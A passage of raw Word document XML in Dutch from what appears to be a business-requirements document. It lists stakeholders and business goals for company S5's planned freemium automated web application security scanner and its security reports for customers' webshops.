    <w:p w14:paraId="7950AEEF" w14:textId="34E5EAC9" w:rsidR="00456DAE" w:rsidRPr="00456DAE" w:rsidRDefault="00FD2B9F" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">S5 – De opdrachtgevers van het project en </w:t>
      </w:r>
      <w:r w:rsidR="004C7C0D">
        <w:t>product owners</w:t>
      </w:r>
      <w:r w:rsidR="00456DAE">
        <w:t>. Zij zijn deels verantwoordelijk voor</w:t>
      </w:r>
      <w:r w:rsidR="002A38E3">
        <w:t xml:space="preserve"> het goedkeuren van userpoints</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15310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Klanten S5 – Zij zijn het die de eindgebruikers zijn van het softwaresysteem, hun belangen staan vooraan in het project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADF1ACE" w14:textId="16A91F7A" w:rsidR="00B27C83" w:rsidRPr="00126FCF" w:rsidRDefault="00F875D2" w:rsidP="00126FCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Administrator </w:t>
      </w:r>
      <w:r w:rsidR="00E149B4">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E149B4">
        <w:t>Zij beheren het softwaresysteem na dat het live is gegaan. Voorbeeld het beheren van scans en rapporten</w:t>
      </w:r>
      <w:r w:rsidR="00B27C83" w:rsidRPr="00126FCF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3478BBC6" w14:textId="16B7BD7E"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292E85F1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-912321</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1372609</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7E8D3" id="Rectangle 50" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.85pt;margin-top:-108.05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" fillcolor="#70ad47 [3209]" strokecolor="#70ad47" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0062121F">
        <w:t xml:space="preserve">2.1.2 </w:t>
      </w:r>
      <w:r w:rsidR="001F01DB">
        <w:t>Business Doelen</w:t>
      </w:r>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233AA9D8" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="0048146D">
      <w:r>
        <w:t>S5 wilt een systeem bouwen met als hoofddoel een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GridTable4-Accent6"/>
        <w:tblW w:w="9348" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1552"/>
        <w:gridCol w:w="7796"/>
      </w:tblGrid>
      <w:tr w:rsidR="0009518F" w14:paraId="7CCE9F75"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09518F" w14:paraId="382B175E"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9D7669F"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en geautomatiseerde </w:t>
            </w:r>
            <w:r w:rsidR="00650BF0">
              <w:t>webapplicatie scanner</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> aan te bieden</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F6376FA" w14:textId="75D8024D" w:rsidR="008576FB" w:rsidRDefault="008576FB"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Het toepassen van de Freemium verdienmodel</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="465F3DC0"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09518F" w14:paraId="02DF7AEC" w14:textId="77777777" w:rsidTr="005A427C">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>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5480201F"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r w:rsidR="00221AD7">
              <w:t>securityrapport</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1400E04C" w14:textId="77777777"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GridTable4-Accent6"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3143"/>
        <w:gridCol w:w="3809"/>
      </w:tblGrid>
      <w:tr w:rsidR="0022178C" w14:paraId="5944ED07"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628037C" w14:textId="3DCC5D6B" w:rsidR="00287FD9" w:rsidRDefault="008F62A4" w:rsidP="008F62A4">
            <w:r>
              <w:t>Doel Subject (DS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3809" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="681A6FEE" w14:textId="39421573" w:rsidR="00287FD9" w:rsidRDefault="0022178C">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>De stakeholder die eigenaar is van het doel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022178C" w14:paraId="29A372E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4461124" w14:textId="6428B79F" w:rsidR="00287FD9" w:rsidRDefault="008F62A4">
            <w:r>
              <w:t>Doel Object (DO)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3809" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F0C659F" w14:textId="78159A7D" w:rsidR="00287FD9" w:rsidRDefault="0022178C">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">De entiteit </w:t>
            </w:r>
            <w:r w:rsidR="00C93968">
              <w:t>van het doel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022178C" w14:paraId="76FD4B8E" w14:textId="77777777" w:rsidTr="005A427C">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3143" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E7C0891" w14:textId="290E8164" w:rsidR="00287FD9" w:rsidRDefault="008F62A4">
            <w:r>
              <w:t>Omgeving (O)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3809" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77619E28" w14:textId="6B9500D6" w:rsidR="00287FD9" w:rsidRDefault="003B62E0">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>De context van het doel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022178C" w14:paraId="10E718FB"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487D7F" w14:textId="42447BF4" w:rsidR="00287FD9" w:rsidRDefault="008F62A4">
            <w:r>
              <w:t>Doel (D)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3809" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E03552A" w14:textId="6D5E68E6" w:rsidR="00287FD9" w:rsidRDefault="001728BC">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Het doel zelf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022178C" w14:paraId="07743F14" w14:textId="77777777" w:rsidTr="005A427C">
        <w:trPr>
          <w:trHeight w:val="292"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3143" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CB61E3E" w14:textId="3D898E5C" w:rsidR="00287FD9" w:rsidRDefault="008F62A4" w:rsidP="008F62A4">
            <w:r>
              <w:t>Doel Maatregel (DM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3809" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41B2E7D2" w14:textId="4831085D" w:rsidR="00287FD9" w:rsidRDefault="00345C69">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Het succes criteria van het doel </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022178C" w14:paraId="0F275A85" w14:textId="77777777" w:rsidTr="005A427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Pr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Achtergrond informatie over het doel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04FEFE2B" w14:textId="3C1D42A9" w:rsidR="000F2404" w:rsidRDefault="00272E09">
      <w:r>
        <w:t>Tabel 2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DD2E9E" w14:textId="56370855" w:rsidR="000F2404" w:rsidRDefault="000F2404">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent6"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1510" w:tblpY="5"/>
        <w:tblW w:w="9773" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1789"/>
        <w:gridCol w:w="4393"/>
        <w:gridCol w:w="3591"/>
      </w:tblGrid>
      <w:tr w:rsidR="002B7C65" w14:paraId="09C636CA" w14:textId="77777777" w:rsidTr="002B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FE7C35D" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRDefault="002B7C65" w:rsidP="002B7C65">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Doel Categorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="193E8BDF"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Informele business doel statement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F88AFA0"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usiness Doel Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B7C65" w14:paraId="67CD96E7" w14:textId="77777777" w:rsidTr="002B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4309690" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="00503AB1" w:rsidRDefault="002B7C65" w:rsidP="002B7C65">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00503AB1">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Service aanbod uitbreiden</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="270CC81D"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r w:rsidRPr="00503AB1">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">We moeten de service aanbod uitbreiden door een geautomatiseerde </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Webapplicatie scanner</w:t>
            </w:r>
            <w:r w:rsidRPr="00503AB1">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> te introduceren.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3065C40C"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p>
          <w:p w14:paraId="4B1ECD16" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="00503AB1" w:rsidRDefault="002B7C65" w:rsidP="002B7C65">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>(Waarmee iedere gebruiker een gratis scan kan uitvoeren op basis van de Freemium verdienmodel en de gebruiker de optie geven om een Premiumaccount aan te schaffen.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3591" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="3365"/>
            </w:tblGrid>
            <w:tr w:rsidR="002B7C65" w14:paraId="0110230E" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="77AE9ED4" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="0073200F" w:rsidRDefault="002B7C65" w:rsidP="007B6022">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>DS: S5</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="002B7C65" w14:paraId="7E417D80" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="631D8343" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="001F51D9" w:rsidRDefault="002B7C65" w:rsidP="007B6022">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>DO: Webapplicatie scanner</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="002B7C65" w14:paraId="78BFD8F6" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="31788CD7" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="00351F2E" w:rsidRDefault="002B7C65" w:rsidP="007B6022">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>O: Service aanbod uitbreiden</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="002B7C65" w14:paraId="7BBC38A4" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="72F352CB" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="00316498" w:rsidRDefault="002B7C65" w:rsidP="007B6022">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>D: Een nieuwe service aanbieden</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="002B7C65" w14:paraId="71A613AC" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="7ED5F85D" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="001849E7" w:rsidRDefault="002B7C65" w:rsidP="007B6022">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>DM: Klanten kunnen een gratis geautomatiseerde scan uitvoeren</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="002B7C65" w14:paraId="3EC50268" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="0B4DB27C" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="00232CA1" w:rsidRDefault="002B7C65" w:rsidP="007B6022">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>AI: S5 wilt de klanten een tool aanbieden om hun websites te scannen op security</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="26FA34F0"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b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B7C65" w14:paraId="14A5738E" w14:textId="77777777" w:rsidTr="002B7C65">
        <w:trPr>
          <w:trHeight w:val="3241"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1789" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55231334" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="008E079D" w:rsidRDefault="002B7C65" w:rsidP="002B7C65">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Het servicekwaliteit verbeteren</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DA49253" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="007868ED" w:rsidRDefault="002B7C65" w:rsidP="002B7C65">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>We moeten naast het ontwikkelen van websites ook meer de focus leggen op security door de gebruiker/klant meer inzicht te bieden op de security staat van hun webshop.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3591" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="3365"/>
            </w:tblGrid>
            <w:tr w:rsidR="002B7C65" w:rsidRPr="0073200F" w14:paraId="06E8B815" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="6D8E4B39" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="0073200F" w:rsidRDefault="002B7C65" w:rsidP="007B6022">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>DS: S5</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="002B7C65" w:rsidRPr="001F51D9" w14:paraId="4C0F87B5" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="28EAA02C" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="001F51D9" w:rsidRDefault="002B7C65" w:rsidP="007B6022">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>DO: Security Rapport</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="002B7C65" w:rsidRPr="00351F2E" w14:paraId="5101FB4D" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="0AD60EC9" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="00351F2E" w:rsidRDefault="002B7C65" w:rsidP="007B6022">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>O: Kwaliteit service verbeteren</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="002B7C65" w:rsidRPr="00316498" w14:paraId="69C4AE25" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="5412A159" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="00316498" w:rsidRDefault="002B7C65" w:rsidP="007B6022">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>D: Security Rapporten genereren op basis van de gevonden kwetsbaarheden</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="002B7C65" w:rsidRPr="001849E7" w14:paraId="3E816100" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="3959A0FA" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="001849E7" w:rsidRDefault="002B7C65" w:rsidP="007B6022">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>DM: Klanten inzicht bieden in de security van hen webshops</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="002B7C65" w:rsidRPr="00232CA1" w14:paraId="4D3D536B" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="04731019" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="00232CA1" w:rsidRDefault="002B7C65" w:rsidP="007B6022">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>AI: S5 wilt de klanten meer overzicht bieden op de security van hen webshops</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="44B5FC86" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRDefault="002B7C65" w:rsidP="002B7C65">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
